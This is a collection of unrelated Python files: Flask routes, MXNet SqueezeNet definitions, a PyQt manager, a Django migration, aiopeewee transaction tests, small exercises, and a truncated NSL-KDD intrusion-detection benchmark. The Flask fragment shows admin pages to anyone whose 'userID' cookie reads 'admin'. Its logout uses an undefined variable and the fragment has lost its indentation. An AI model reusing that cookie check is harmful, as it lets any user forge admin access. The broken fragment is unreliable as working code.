@app.route("/appendgrp", methods = ["POST"])
def appendgrp():
Hnm = request.form.get("Hostnm")
ip = request.form.get("IPAddr")
Dnm = request.form.get("DName")
#print(f"Hnm = {Hnm} | ip = {ip} | Dnm = {Dnm}")
#newgrp = {"hostname": f"{Hnm}","ip": f"{ip}", "fqdn": f"{Dnm}"}
#print(newgrp)
if Hnm and ip and Dnm:
newgrp = {"hostname": f"{Hnm}","ip": f"{ip}", "fqdn": f"{Dnm}"}
#print(newgrp)
groups.append(newgrp)
#print(groups)
return redirect(url_for("showtbl")) # redirect to display groups table
# if user sends POST to /logout
@app.route("/logout", methods = ["GET"])
def logout():
#resp = make_response(view_function())
resp.set_cookie("userID", "")
#request.cookies.set_cookie("userID","")
return redirect(url_for("index")) # redirect to login after logout action
@app.route("/showtbl")
def showtbl():
name = request.cookies.get("userID") # preferred method
if name == "admin":
return render_template("showtbladm.html",headings=header,data=groups) # found in templates/
else:
return render_template("showtbloth.html",headings=header,data=groups) # found in templates/
if __name__ == "__main__":
app.run(host="0.0.0.0", port=2224)
|
import mxnet as mx
def fire_module(data, squeeze_depth, expand_depth, prefix):
    """Build one SqueezeNet fire module symbol.

    A 1x1 "squeeze" convolution feeds two parallel "expand" convolutions
    (1x1 and 3x3), each ReLU-activated; their outputs are concatenated
    along the channel axis. Symbol names follow '<prefix>_<layer>'.
    """
    def conv_relu(inp, layer, num_filter, kernel, pad):
        # convolution followed by ReLU, with the original naming scheme
        conv = mx.symbol.Convolution(
            name='{}_{}'.format(prefix, layer), data=inp,
            num_filter=num_filter, pad=pad, kernel=kernel,
            stride=(1, 1), no_bias=False)
        return mx.symbol.Activation(
            name='{}_relu_{}'.format(prefix, layer), data=conv,
            act_type='relu')

    squeezed = conv_relu(data, 'squeeze1x1', squeeze_depth, (1, 1), (0, 0))
    expand_1x1 = conv_relu(squeezed, 'expand1x1', expand_depth, (1, 1), (0, 0))
    expand_3x3 = conv_relu(squeezed, 'expand3x3', expand_depth, (3, 3), (1, 1))
    return mx.symbol.Concat(
        name='{}_concat'.format(prefix), *[expand_1x1, expand_3x3])
def squeezenet_v10(num_classes=1000):
    """Build the SqueezeNet v1.0 feature extractor (conv1 .. fire9).

    Args:
        num_classes: currently unused — the classifier head (drop9..softmax)
            is commented out below, so only features are returned.

    Returns:
        mx.symbol: the fire9 concat output.
    """
    data = mx.symbol.Variable(name='data')
    # stem: 7x7/2 conv + ReLU + 3x3/2 max pool
    conv1 = mx.symbol.Convolution(name='conv1', data=data, num_filter=96, pad=(0,0), kernel=(7,7), stride=(2,2), no_bias=False)
    relu_conv1 = mx.symbol.Activation(name='relu_conv1', data=conv1, act_type='relu')
    pool1 = mx.symbol.Pooling(name='pool1', data=relu_conv1, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
    # fire modules with max pooling after fire4 and fire8 (v1.0 layout)
    fire2_concat = fire_module(pool1, 16, 64, "fire2")
    fire3_concat = fire_module(fire2_concat, 16, 64, "fire3")
    fire4_concat = fire_module(fire3_concat, 32, 128, "fire4")
    pool4 = mx.symbol.Pooling(name='pool4', data=fire4_concat, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
    fire5_concat = fire_module(pool4, 32, 128, "fire5")
    fire6_concat = fire_module(fire5_concat, 48, 192, "fire6")
    fire7_concat = fire_module(fire6_concat, 48, 192, "fire7")
    fire8_concat = fire_module(fire7_concat, 64, 256, "fire8")
    pool8 = mx.symbol.Pooling(name='pool8', data=fire8_concat, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
    fire9_concat = fire_module(pool8, 64, 256, "fire9")
    return fire9_concat
    # classifier head kept for reference (re-enable to get class scores):
    # drop9 = mx.symbol.Dropout(name='drop9', data=fire9_concat, p=0.500000)
    # conv10 = mx.symbol.Convolution(name='conv10', data=drop9, num_filter=num_classes, pad=(0,0), kernel=(1,1), stride=(1,1), no_bias=False)
    # relu_conv10 = mx.symbol.Activation(name='relu_conv10', data=conv10, act_type='relu')
    # pool10 = mx.symbol.Pooling(name='pool10', data=relu_conv10, pooling_convention='full', global_pool=True, pool_type='avg')
    # flatten = mx.symbol.Flatten(data=pool10, name='flatten')
    # softmax = mx.symbol.SoftmaxOutput(name='softmax', data=flatten)
    # return softmax
def squeezenet_v11(num_classes=1000):
    """Build the SqueezeNet v1.1 feature extractor as an MXNet symbol.

    v1.1 uses a smaller 3x3/64-filter stem and pools earlier than v1.0.
    Returns the fire9 concat output; the classifier head is commented out
    below, so ``num_classes`` is currently unused.
    """
    net = mx.symbol.Variable(name='data')
    net = mx.symbol.Convolution(name='conv1', data=net, num_filter=64, pad=(0,0), kernel=(3,3), stride=(2,2), no_bias=False)
    net = mx.symbol.Activation(name='relu_conv1', data=net, act_type='relu')
    net = mx.symbol.Pooling(name='pool1', data=net, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
    net = fire_module(net, 16, 64, "fire2")
    net = fire_module(net, 16, 64, "fire3")
    net = mx.symbol.Pooling(name='pool3', data=net, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
    net = fire_module(net, 32, 128, "fire4")
    net = fire_module(net, 32, 128, "fire5")
    net = mx.symbol.Pooling(name='pool5', data=net, pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
    net = fire_module(net, 48, 192, "fire6")
    net = fire_module(net, 48, 192, "fire7")
    net = fire_module(net, 64, 256, "fire8")
    net = fire_module(net, 64, 256, "fire9")
    return net
    # Original classifier head, disabled upstream and kept for reference:
    # drop9 = mx.symbol.Dropout(name='drop9', data=fire9_concat, p=0.500000)
    # conv10 = mx.symbol.Convolution(name='conv10', data=drop9, num_filter=num_classes, pad=(0,0), kernel=(1,1), stride=(1,1), no_bias=False)
    # relu_conv10 = mx.symbol.Activation(name='relu_conv10', data=conv10, act_type='relu')
    # pool10 = mx.symbol.Pooling(name='pool10', data=relu_conv10, pooling_convention='full', global_pool=True, pool_type='avg')
    # flatten = mx.symbol.Flatten(data=pool10, name='flatten')
    # softmax = mx.symbol.SoftmaxOutput(name='softmax', data=flatten)
    # return softmax
def get_symbol(num_classes=1000, version="v1.0", **kwargs):
    """Return the SqueezeNet symbol for the requested version.

    ``version`` must be "v1.0" or "v1.1"; extra keyword args are ignored.
    """
    assert version in ("v1.0", "v1.1")
    builders = {"v1.0": squeezenet_v10, "v1.1": squeezenet_v11}
    return builders[version](num_classes)
|
from PyQt5 import QtWidgets
from Graphics import Ui_MainWindow
from ConnectionPackage.ConnectionModule import ConnectionModule
from SignalGenerationPackage.SignalGenerationModule import SignalGenerationModule
from FrequencySettingPackage.FrequencySettingModule import FrequencySettingModule
from LogVisualizationPackage.LogVisualizationModule import LogVisualizationModule
class ApplicationManager:
    """Wires the application modules to a shared Qt main window.

    Instantiating the manager builds the window, applies the generated UI,
    and immediately starts every registered module against that UI.
    """

    def __init__(self):
        # modules are started in list order
        self.ApplicationModules = [
            ConnectionModule(),
            FrequencySettingModule(),
            SignalGenerationModule(),
            LogVisualizationModule(),
        ]
        self.MainWindow = QtWidgets.QMainWindow()
        self.UserInterface = Ui_MainWindow()
        self.UserInterface.setupUi(self.MainWindow)
        self.RunAllModules()

    def RunAllModules(self):
        """Hand the shared UI object to every module's Run() entry point."""
        for module in self.ApplicationModules:
            module.Run(self.UserInterface)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-05-08 10:39
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create the GarminPingNotification table and three lookup indexes.

    Auto-generated by Django 1.11.2 (2018-05-08); edit with care.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('garmin', '0024_auto_20180329_0916'),
    ]
    operations = [
        migrations.CreateModel(
            name='GarminPingNotification',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('upload_start_time_seconds', models.IntegerField(blank=True, null=True)),
                # summary_type values mirror the Garmin Health API summary kinds
                ('summary_type', models.CharField(choices=[('dailies', 'Dailies'), ('activities', 'Activities'), ('manuallyUpdatedActivities', 'Manually Updated Activities'), ('epochs', 'Epochs'), ('sleeps', 'Sleeps'), ('bodyComps', 'Body Composition'), ('stressDetails', 'Stress Details'), ('moveIQActivities', 'Move IQ Activities'), ('userMetrics', 'User Metrics'), ('deregistration', 'Deregistration')], max_length=100)),
                # raw ping payload stored verbatim
                ('notification', models.TextField()),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # index for per-user time-window queries
        migrations.AddIndex(
            model_name='garminpingnotification',
            index=models.Index(fields=['user', 'upload_start_time_seconds'], name='garmin_garm_user_id_54c4a3_idx'),
        ),
        # index for most-recent-first listings
        migrations.AddIndex(
            model_name='garminpingnotification',
            index=models.Index(fields=['-created_at'], name='garmin_garm_created_352598_idx'),
        ),
        # index for global time-window queries
        migrations.AddIndex(
            model_name='garminpingnotification',
            index=models.Index(fields=['upload_start_time_seconds'], name='garmin_garm_upload__6a0297_idx'),
        ),
    ]
|
# import threading
# from peewee import _atomic
# from peewee import SqliteDatabase
# from peewee import transaction
# from playhouse.tests.base import database_class
# from playhouse.tests.base import mock
# from playhouse.tests.base import ModelTestCase
# from playhouse.tests.base import skip_if
# from playhouse.tests.base import test_db
# from playhouse.tests.models import *
import sys
import pytest
from functools import partial
from models import *
from peewee import CharField, IntegerField, SQL, fn, R, QueryCompiler, ForeignKeyField
from aiopeewee import AioModel as Model
from aiopeewee import AioMySQLDatabase
from models import db, User, Blog, UniqueModel
pytestmark = pytest.mark.asyncio
# class TestTransaction(ModelTestCase):
# requires = [User, Blog]
# def tearDown(self):
# super(TestTransaction, self).tearDown()
# test_db.set_autocommit(True)
# def test_transaction_connection_handling(self):
# patch = 'peewee.Database'
# db = SqliteDatabase(':memory:')
# with mock.patch(patch, wraps=db) as patched_db:
# with transaction(patched_db):
# patched_db.begin.assert_called_once_with()
# self.assertEqual(patched_db.commit.call_count, 0)
# self.assertEqual(patched_db.rollback.call_count, 0)
# patched_db.begin.assert_called_once_with()
# patched_db.commit.assert_called_once_with()
# self.assertEqual(patched_db.rollback.call_count, 0)
# with mock.patch(patch, wraps=db) as patched_db:
# def _test_patched():
# patched_db.commit.side_effect = ValueError
# with transaction(patched_db):
# pass
# self.assertRaises(ValueError, _test_patched)
# patched_db.begin.assert_called_once_with()
# patched_db.commit.assert_called_once_with()
# patched_db.rollback.assert_called_once_with()
# def test_atomic_nesting(self):
# db = SqliteDatabase(':memory:')
# db_patches = mock.patch.multiple(
# db,
# begin=mock.DEFAULT,
# commit=mock.DEFAULT,
# execute_sql=mock.DEFAULT,
# rollback=mock.DEFAULT)
# with mock.patch('peewee.Database', wraps=db) as patched_db:
# with db_patches as db_mocks:
# begin = db_mocks['begin']
# commit = db_mocks['commit']
# execute_sql = db_mocks['execute_sql']
# rollback = db_mocks['rollback']
# with _atomic(patched_db):
# patched_db.transaction.assert_called_once_with(None)
# begin.assert_called_once_with(lock_type=None)
# self.assertEqual(patched_db.savepoint.call_count, 0)
# with _atomic(patched_db):
# patched_db.transaction.assert_called_once_with(None)
# begin.assert_called_once_with(lock_type=None)
# patched_db.savepoint.assert_called_once_with()
# self.assertEqual(commit.call_count, 0)
# self.assertEqual(rollback.call_count, 0)
# with _atomic(patched_db):
# (patched_db.transaction
# .assert_called_once_with(None))
# begin.assert_called_once_with(lock_type=None)
# self.assertEqual(
# patched_db.savepoint.call_count,
# 2)
# begin.assert_called_once_with(lock_type=None)
# self.assertEqual(commit.call_count, 0)
# self.assertEqual(rollback.call_count, 0)
# commit.assert_called_once_with()
# self.assertEqual(rollback.call_count, 0)
# def test_savepoint_explicit_commits(self):
# with test_db.atomic() as txn:
# User.create(username='txn-rollback')
# txn.rollback()
# User.create(username='txn-commit')
# txn.commit()
# with test_db.atomic() as sp:
# User.create(username='sp-rollback')
# sp.rollback()
# User.create(username='sp-commit')
# sp.commit()
# usernames = [u.username for u in User.select().order_by(User.username)]
# self.assertEqual(usernames, ['sp-commit', 'txn-commit'])
# def test_autocommit(self):
# test_db.set_autocommit(False)
# test_db.begin()
# u1 = User.create(username='u1')
# u2 = User.create(username='u2')
# # open up a new connection to the database, it won't register any blogs
# # as being created
# new_db = self.new_connection()
# res = new_db.execute_sql('select count(*) from users;')
# self.assertEqual(res.fetchone()[0], 0)
# # commit our blog inserts
# test_db.commit()
# # now the blogs are query-able from another connection
# res = new_db.execute_sql('select count(*) from users;')
# self.assertEqual(res.fetchone()[0], 2)
# def test_transactions(self):
# def transaction_generator():
# with test_db.transaction():
# User.create(username='u1')
# yield
# User.create(username='u2')
# gen = transaction_generator()
# next(gen)
# conn2 = self.new_connection()
# res = conn2.execute_sql('select count(*) from users;').fetchone()
# self.assertEqual(res[0], 0)
# self.assertEqual(User.select().count(), 1)
# # Consume the rest of the generator.
# for _ in gen:
# pass
# self.assertEqual(User.select().count(), 2)
# res = conn2.execute_sql('select count(*) from users;').fetchone()
# self.assertEqual(res[0], 2)
# def test_manual_commit_rollback(self):
# def assertUsers(expected):
# query = User.select(User.username).order_by(User.username)
# self.assertEqual(
# [username for username, in query.tuples()],
# expected)
# with test_db.transaction() as txn:
# User.create(username='charlie')
# txn.commit()
# User.create(username='huey')
# txn.rollback()
# assertUsers(['charlie'])
# with test_db.transaction() as txn:
# User.create(username='huey')
# txn.rollback()
# User.create(username='zaizee')
# assertUsers(['charlie', 'zaizee'])
# def test_transaction_decorator(self):
# @test_db.transaction()
# def create_user(username):
# User.create(username=username)
# create_user('charlie')
# self.assertEqual(User.select().count(), 1)
# def test_commit_on_success(self):
# self.assertTrue(test_db.get_autocommit())
# @test_db.commit_on_success
# def will_fail():
# User.create(username='u1')
# Blog.create() # no blog, will raise an error
# self.assertRaises(IntegrityError, will_fail)
# self.assertEqual(User.select().count(), 0)
# self.assertEqual(Blog.select().count(), 0)
# @test_db.commit_on_success
# def will_succeed():
# u = User.create(username='u1')
# Blog.create(title='b1', user=u)
# will_succeed()
# self.assertEqual(User.select().count(), 1)
# self.assertEqual(Blog.select().count(), 1)
# async def test_context_mgr(flushdb):
# async def do_will_fail():
# #TODO it was db.transaction()
# async with db.atomic():
# await User.create(username='u1')
# await Blog.create() # no blog, will raise an error
# with pytest.raises(IntegrityError):
# await do_will_fail()
# assert await Blog.select().count() == 0
# async def do_will_succeed():
# #TODO it was db.atomic()
# async with db.atomic():
# u = await User.create(username='u1')
# await Blog.create(title='b1', user=u)
# await do_will_succeed()
# assert await User.select().count() == 1
# assert await Blog.select().count() == 1
# async def do_manual_rollback():
# #TODO it was db.atomic()
# async with db.atomic() as txn:
# await User.create(username='u2')
# await txn.rollback()
# await do_manual_rollback()
# assert await User.select().count() == 1
# assert await Blog.select().count() == 1
# def test_nesting_transactions(self):
# @test_db.commit_on_success
# def outer(should_fail=False):
# self.assertEqual(test_db.transaction_depth(), 1)
# User.create(username='outer')
# inner(should_fail)
# self.assertEqual(test_db.transaction_depth(), 1)
# @test_db.commit_on_success
# def inner(should_fail):
# self.assertEqual(test_db.transaction_depth(), 2)
# User.create(username='inner')
# if should_fail:
# raise ValueError('failing')
# self.assertRaises(ValueError, outer, should_fail=True)
# self.assertEqual(User.select().count(), 0)
# self.assertEqual(test_db.transaction_depth(), 0)
# outer(should_fail=False)
# self.assertEqual(User.select().count(), 2)
# self.assertEqual(test_db.transaction_depth(), 0)
# class TestExecutionContext(ModelTestCase):
# requires = [User]
# def test_context_simple(self):
# with test_db.execution_context():
# User.create(username='charlie')
# self.assertEqual(test_db.execution_context_depth(), 1)
# self.assertEqual(test_db.execution_context_depth(), 0)
# with test_db.execution_context():
# self.assertTrue(
# User.select().where(User.username == 'charlie').exists())
# self.assertEqual(test_db.execution_context_depth(), 1)
# self.assertEqual(test_db.execution_context_depth(), 0)
# queries = self.queries()
# def test_context_ext(self):
# with test_db.execution_context():
# with test_db.execution_context() as inner_ctx:
# with test_db.execution_context():
# User.create(username='huey')
# self.assertEqual(test_db.execution_context_depth(), 3)
# conn = test_db.get_conn()
# self.assertEqual(conn, inner_ctx.connection)
# self.assertTrue(
# User.select().where(User.username == 'huey').exists())
# self.assertEqual(test_db.execution_context_depth(), 0)
# def test_context_multithreaded(self):
# conn = test_db.get_conn()
# evt = threading.Event()
# evt2 = threading.Event()
# def create():
# with test_db.execution_context() as ctx:
# database = ctx.database
# self.assertEqual(database.execution_context_depth(), 1)
# evt2.set()
# evt.wait()
# self.assertNotEqual(conn, ctx.connection)
# User.create(username='huey')
# create_t = threading.Thread(target=create)
# create_t.daemon = True
# create_t.start()
# evt2.wait()
# self.assertEqual(test_db.execution_context_depth(), 0)
# evt.set()
# create_t.join()
# self.assertEqual(test_db.execution_context_depth(), 0)
# self.assertEqual(User.select().count(), 1)
# def test_context_concurrency(self):
# def create(i):
# with test_db.execution_context():
# with test_db.execution_context() as ctx:
# User.create(username='u%s' % i)
# self.assertEqual(ctx.database.execution_context_depth(), 2)
# threads = [threading.Thread(target=create, args=(i,))
# for i in range(5)]
# for thread in threads:
# thread.start()
# [thread.join() for thread in threads]
# self.assertEqual(
# [user.username for user in User.select().order_by(User.username)],
# ['u0', 'u1', 'u2', 'u3', 'u4'])
# def test_context_conn_error(self):
# class MagicException(Exception):
# pass
# class FailDB(SqliteDatabase):
# def _connect(self, *args, **kwargs):
# raise MagicException('boo')
# db = FailDB(':memory:')
# def generate_exc():
# try:
# with db.execution_context():
# db.execute_sql('SELECT 1;')
# except MagicException:
# db.get_conn()
# self.assertRaises(MagicException, generate_exc)
# class TestAutoRollback(ModelTestCase):
# requires = [User, Blog]
# def setUp(self):
# test_db.autorollback = True
# super(TestAutoRollback, self).setUp()
# def tearDown(self):
# test_db.autorollback = False
# test_db.set_autocommit(True)
# super(TestAutoRollback, self).tearDown()
# def test_auto_rollback(self):
# # Exceptions are still raised.
# self.assertRaises(IntegrityError, Blog.create)
# # The transaction should have been automatically rolled-back, allowing
# # us to create new objects (in a new transaction).
# u = User.create(username='u')
# self.assertTrue(u.id)
# # No-op, the previous INSERT was already committed.
# test_db.rollback()
# # Ensure we can get our user back.
# u_db = User.get(User.username == 'u')
# self.assertEqual(u.id, u_db.id)
# def test_transaction_ctx_mgr(self):
# 'Only auto-rollback when autocommit is enabled.'
# def create_error():
# self.assertRaises(IntegrityError, Blog.create)
# # autocommit is disabled in a transaction ctx manager.
# with test_db.transaction():
# # Error occurs, but exception is caught, leaving the current txn
# # in a bad state.
# create_error()
# try:
# create_error()
# except Exception as exc:
# # Subsequent call will raise an InternalError with postgres.
# self.assertTrue(isinstance(exc, InternalError))
# else:
# self.assertFalse(
# issubclass(database_class, PostgresqlDatabase))
# # New transactions are not affected.
# self.test_auto_rollback()
# def test_manual(self):
# test_db.set_autocommit(False)
# # Will not be rolled back.
# self.assertRaises(IntegrityError, Blog.create)
# if issubclass(database_class, PostgresqlDatabase):
# self.assertRaises(InternalError, User.create, username='u')
# test_db.rollback()
# u = User.create(username='u')
# test_db.commit()
# u_db = User.get(User.username == 'u')
# self.assertEqual(u.id, u_db.id)
# class TestSavepoints(ModelTestCase):
# requires = [User]
# def _outer(self, fail_outer=False, fail_inner=False):
# with test_db.savepoint():
# User.create(username='outer')
# try:
# self._inner(fail_inner)
# except ValueError:
# pass
# if fail_outer:
# raise ValueError
# def _inner(self, fail_inner):
# with test_db.savepoint():
# User.create(username='inner')
# if fail_inner:
# raise ValueError('failing')
# def assertNames(self, expected):
# query = User.select().order_by(User.username)
# self.assertEqual([u.username for u in query], expected)
# def test_success(self):
# with test_db.transaction():
# self._outer()
# self.assertEqual(User.select().count(), 2)
# self.assertNames(['inner', 'outer'])
# def test_inner_failure(self):
# with test_db.transaction():
# self._outer(fail_inner=True)
# self.assertEqual(User.select().count(), 1)
# self.assertNames(['outer'])
# def test_outer_failure(self):
# # Because the outer savepoint is rolled back, we'll lose the
# # inner savepoint as well.
# with test_db.transaction():
# self.assertRaises(ValueError, self._outer, fail_outer=True)
# self.assertEqual(User.select().count(), 0)
# def test_failure(self):
# with test_db.transaction():
# self.assertRaises(
# ValueError, self._outer, fail_outer=True, fail_inner=True)
# self.assertEqual(User.select().count(), 0)
# class TestAtomic(ModelTestCase):
# requires = [User, UniqueModel]
# TODO: must be explicit with the nested transactions
# async def test_atomic(flushdb):
# async with db.atomic():
# await User.create(username='u1')
# async with db.atomic():
# await User.create(username='u2')
# async with db.atomic() as txn3:
# await User.create(username='u3')
# await txn3.rollback()
# async with db.atomic():
# await User.create(username='u4')
# async with db.atomic() as txn5:
# await User.create(username='u5')
# await txn5.rollback()
# await User.create(username='u6')
# query = await User.select().order_by(User.username)
# assert [u.username for u in query] == ['u1', 'u2', 'u4', 'u6']
# def test_atomic_second_connection(self):
# def test_separate_conn(expected):
# new_db = self.new_connection()
# cursor = new_db.execute_sql('select username from users;')
# usernames = sorted(row[0] for row in cursor.fetchall())
# self.assertEqual(usernames, expected)
# new_db.close()
# with test_db.atomic():
# User.create(username='u1')
# test_separate_conn([])
# with test_db.atomic():
# User.create(username='u2')
# with test_db.atomic() as tx3:
# User.create(username='u3')
# tx3.rollback()
# test_separate_conn([])
# users = User.select(User.username).order_by(User.username)
# self.assertEqual(
# [user.username for user in users],
# ['u1', 'u2'])
# users = User.select(User.username).order_by(User.username)
# self.assertEqual(
# [user.username for user in users],
# ['u1', 'u2'])
# def test_atomic_decorator(self):
# @test_db.atomic()
# def create_user(username):
# User.create(username=username)
# create_user('charlie')
# self.assertEqual(User.select().count(), 1)
# def test_atomic_decorator_nesting(self):
# @test_db.atomic()
# def create_unique(name):
# UniqueModel.create(name=name)
# @test_db.atomic()
# def create_both(username):
# User.create(username=username)
# try:
# create_unique(username)
# except IntegrityError:
# pass
# create_unique('huey')
# self.assertEqual(UniqueModel.select().count(), 1)
# create_both('charlie')
# self.assertEqual(User.select().count(), 1)
# self.assertEqual(UniqueModel.select().count(), 2)
# create_both('huey')
# self.assertEqual(User.select().count(), 2)
# self.assertEqual(UniqueModel.select().count(), 2)
# async def test_atomic_rollback(flushdb):
# async with db.atomic() as txn:
# await UniqueModel.create(name='charlie')
# try:
# async with txn.atomic():
# await UniqueModel.create(name='charlie')
# except IntegrityError:
# pass
# else:
# assert False
# async with txn.atomic() as txn1:
# await UniqueModel.create(name='zaizee')
# try:
# async with txn1.atomic():
# await UniqueModel.create(name='zaizee')
# except IntegrityError:
# pass
# else:
# assert False
# await UniqueModel.create(name='mickey')
# await UniqueModel.create(name='huey')
# names = [um.name async for um in
# UniqueModel.select().order_by(UniqueModel.name)]
# assert names == ['charlie', 'huey', 'mickey', 'zaizee']
async def test_atomic_with_delete(flushdb):
    """Deletes inside plain and nested atomic blocks are committed."""
    for i in range(3):
        await User.create(username=f'u{i}')

    # delete one row inside a single atomic block
    async with db.atomic():
        victim = await User.get(User.username == 'u1')
        await victim.delete_instance()
    names = [u.username async for u in User.select()]
    assert sorted(names) == ['u0', 'u2']

    # delete another row inside a nested atomic block
    async with db.atomic():
        async with db.atomic():
            victim = await User.get(User.username == 'u2')
            await victim.delete_instance()
    names = [u.username async for u in User.select()]
    assert names == ['u0']
|
def paul(arr):
    """Rate Paul's mood from a list of weekly activities.

    Each 'kata' scores 5, 'Petes kata' 10, 'eating' 1; anything else 0.
    Lower totals mean a happier Paul.
    """
    points = {'kata': 5, 'Petes kata': 10, 'eating': 1}
    total = 0
    for activity in arr:
        total += points.get(activity, 0)
    if total < 40:
        return 'Super happy!'
    if total < 70:
        return 'Happy!'
    if total < 100:
        return 'Sad!'
    return 'Miserable!'
|
from __future__ import print_function #输出格式兼容
import os
from PIL import Image
path = 'D:/Downloads/Cache/Desktop/Baselines/DualGAN-master/test/50000/cityscapes/leftImg8bit/frankfurt/'
names = os.listdir(path)
for name in names:
img =Image.open(path+name)
print(img.format, img.size, img.mode) |
# Taking input from users.
# NOTE: Python 2 syntax (print statement, raw_input); this will not run on Python 3.
print "How old are you?",
age=raw_input()
print "How tall are you?",
height=raw_input()
print "How much do you weigh?",
weight=raw_input()
# %r repr-formats each captured string (so answers print quoted)
print "So you're %r years old, %r feet in height and %r kgs heavy." %(age,height,weight)
import csv
from default_clf import DefaultNSL
from itertools import chain
from time import process_time
import numpy as np
import pandas as pd
# Number of timed passes per power/timing measurement.
NUM_PASSES = 100
# Number of train/test passes per accuracy measurement.
NUM_ACC_PASSES = 50
# NSL-KDD dataset CSV locations.
TRAIN_PATH = 'data/KDDTrain+.csv'
TEST_PATH = 'data/KDDTest+.csv'
# Maps each NSL-KDD attack label to its broad category:
# 'normal', DoS, Probe, R2L (remote-to-local) or U2R (user-to-root).
ATTACKS = {
    'normal': 'normal',
    'back': 'DoS',
    'land': 'DoS',
    'neptune': 'DoS',
    'pod': 'DoS',
    'smurf': 'DoS',
    'teardrop': 'DoS',
    'mailbomb': 'DoS',
    'apache2': 'DoS',
    'processtable': 'DoS',
    'udpstorm': 'DoS',
    'ipsweep': 'Probe',
    'nmap': 'Probe',
    'portsweep': 'Probe',
    'satan': 'Probe',
    'mscan': 'Probe',
    'saint': 'Probe',
    'ftp_write': 'R2L',
    'guess_passwd': 'R2L',
    'imap': 'R2L',
    'multihop': 'R2L',
    'phf': 'R2L',
    'spy': 'R2L',
    'warezclient': 'R2L',
    'warezmaster': 'R2L',
    'sendmail': 'R2L',
    'named': 'R2L',
    'snmpgetattack': 'R2L',
    'snmpguess': 'R2L',
    'xlock': 'R2L',
    'xsnoop': 'R2L',
    'worm': 'R2L',
    'buffer_overflow': 'U2R',
    'loadmodule': 'U2R',
    'perl': 'U2R',
    'rootkit': 'U2R',
    'httptunnel': 'U2R',
    'ps': 'U2R',
    'sqlattack': 'U2R',
    'xterm': 'U2R'
}
def get_current_charge():
    """Return the battery's current charge read from Linux sysfs, or 0.

    Prints a message and returns 0 when the sysfs node is unavailable
    (desktop machine, non-Linux OS, or missing battery).
    """
    charge_path = '/sys/class/power_supply/BAT0/charge_now'
    try:
        with open(charge_path) as charge_file:
            return int(charge_file.readline())
    except IOError:
        print("Cannot find current battery charge.")
        return 0
def check_load_training(clf, path):
    """Return the CPU seconds spent in clf.load_training_data(path)."""
    began = process_time()
    clf.load_training_data(path)
    return process_time() - began
def check_load_testing(clf, path):
    """Return the CPU seconds spent in clf.load_test_data(path)."""
    began = process_time()
    clf.load_test_data(path)
    return process_time() - began
def check_training(clf):
    """Return the CPU seconds spent in clf.train_clf()."""
    began = process_time()
    clf.train_clf()
    return process_time() - began
def check_testing_entire_dataset(clf, train=False):
start = process_time()
clf.test_clf(train)
end = process_time()
return end - start
def check_predict_row(clf, row):
    """Return the CPU seconds spent predicting a single sample row."""
    began = process_time()
    clf.predict(row)
    return process_time() - began
def get_stats(arr, function, *args, **kwargs):
    """Time ``function`` once per slot of ``arr`` and report summary stats.

    Each call's result (a duration from one of the check_* helpers) is
    written into ``arr``; the battery charge is sampled before and after
    the whole run.

    Returns [mean_time, std_time, charge_consumed].
    """
    charge_start = get_current_charge()
    # Iterate over the buffer's own length rather than the NUM_PASSES
    # global, so callers may pass differently-sized buffers.
    for i in range(len(arr)):
        arr[i] = function(*args, **kwargs)
    charge_end = get_current_charge()
    return [arr.mean(), arr.std(), charge_start - charge_end]
def evaluate_power(clf):
    """Benchmark time and battery drain for every stage of ``clf``.

    Runs NUM_PASSES timed repetitions of loading, training, whole-dataset
    testing and single-row prediction, printing each [mean, std, charge]
    triple and appending them all to results.csv.
    """
    # one buffer reused by every get_stats call (NUM_PASSES timings)
    res = np.empty(shape=(NUM_PASSES, 1))
    load_train = get_stats(res, check_load_training, clf, TRAIN_PATH)
    print('Loading Training: ', load_train)
    load_test = get_stats(res, check_load_testing, clf, TEST_PATH)
    print('Loading Testing: ', load_test)
    train = get_stats(res, check_training, clf)
    print('Training: ', train)
    test_dataset = get_stats(res, check_testing_entire_dataset, clf)
    print('Testing dataset: ', test_dataset)
    # single sample reshaped to (1, n_features) for predict()
    # NOTE(review): assumes clf.testing is (features frame, labels) — confirm
    row = clf.testing[0].iloc[0].values.reshape(1, -1)
    test_row = get_stats(res, check_predict_row, clf, row)
    print('Testing one row: ', test_row)
    with open('results.csv', 'a', newline='') as csvf:
        csv_writer = csv.writer(csvf)
        csv_writer.writerow([clf.__class__.__name__, 'Number of Passes:', NUM_PASSES, 'Power'])
        csv_writer.writerow(['Function', 'Time (s) Mean', 'Time Std',
                             'Total Power (microwatt-hour)'])
        csv_writer.writerow(['Loading Training Data'] + load_train)
        csv_writer.writerow(['Loading Testing Data'] + load_test)
        csv_writer.writerow(['Training Classifier'] + train)
        csv_writer.writerow(['Testing Dataset'] + test_dataset)
        csv_writer.writerow(['Testing One Row'] + test_row)
def evaluate_accuracy(clf):
    """Measure ``clf``'s accuracy over NUM_ACC_PASSES shuffled runs.

    Tracks, per attack category, how many samples were predicted as attack
    vs normal, derives per-category accuracy and an aggregate confusion
    count, writes everything to results.csv and returns [mean, std] of the
    overall accuracy.
    """
    acc = np.empty(shape=(NUM_ACC_PASSES, 1))
    clf.load_training_data(TRAIN_PATH)
    clf.load_test_data(TEST_PATH)
    # map raw attack labels to their broad category (DoS/Probe/R2L/U2R/normal)
    cat_labels = clf.testing[1].apply(lambda x: ATTACKS[x])
    # per category: [counts predicted as attack, counts predicted as normal],
    # each an array with one slot per pass
    cats = {'U2R':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))],
            'DoS':[np.zeros(shape=(NUM_ACC_PASSES, 1)), np.zeros(shape=(NUM_ACC_PASSES, 1))],
